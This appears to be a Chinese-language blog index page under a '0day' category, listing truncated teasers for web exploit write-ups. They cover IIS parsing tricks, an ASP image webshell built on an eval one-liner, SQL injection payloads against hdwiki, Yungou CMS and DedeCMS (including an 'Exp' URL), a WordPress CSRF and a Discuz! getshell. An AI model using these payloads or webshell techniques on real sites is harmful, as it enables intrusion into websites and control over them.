一、IIS 5.x/6.0解析漏洞 IIS 6.0解析利用方法有两种 1.目录解析 /xx.asp/xx.jpg 2.文件解析 wooyun.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa ……
分类:0day
asp图片木马的制作和使用
主要亮点:图片木马(可以正常打开显示的木马) 先看代码: 仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。 1、找一张图片,名字改成1.jpg 2、<%eval req……
hdwiki5.1 SQL注入漏洞
Author:phithon /control/edition.php 119行 注意这句 判断$this->post[‘eid’][0]和$this->post[‘eid’][1]如果有一个不是数字,则报错。 之后就将…
云购Cms修复不当仍存在Sql注入
漏洞作者: 浅蓝 详细说明: 根据雨牛的 WooYun: Yungoucms Sql Injection 第一枚 我看了下相同位置的代码 /*获取客户端ip*/ 把xff改为 1.1.1.1’or update……
WordPress插件Easy Social Icons V1.2.2 – CSRF漏洞攻击
FROM http://www.exploit-db.com/exploits/36161/ ==================================================== Product: E…
DedeCMS 20140201 之前的5.7通杀
无需注册会员账号: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//…
Discuz!X系列转换工具任意代码写入漏洞 getshell
有些论坛 可能路径放在其它目录 没有utility 直接convert等 如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功 http://mianguage.com/utility/convert/ind…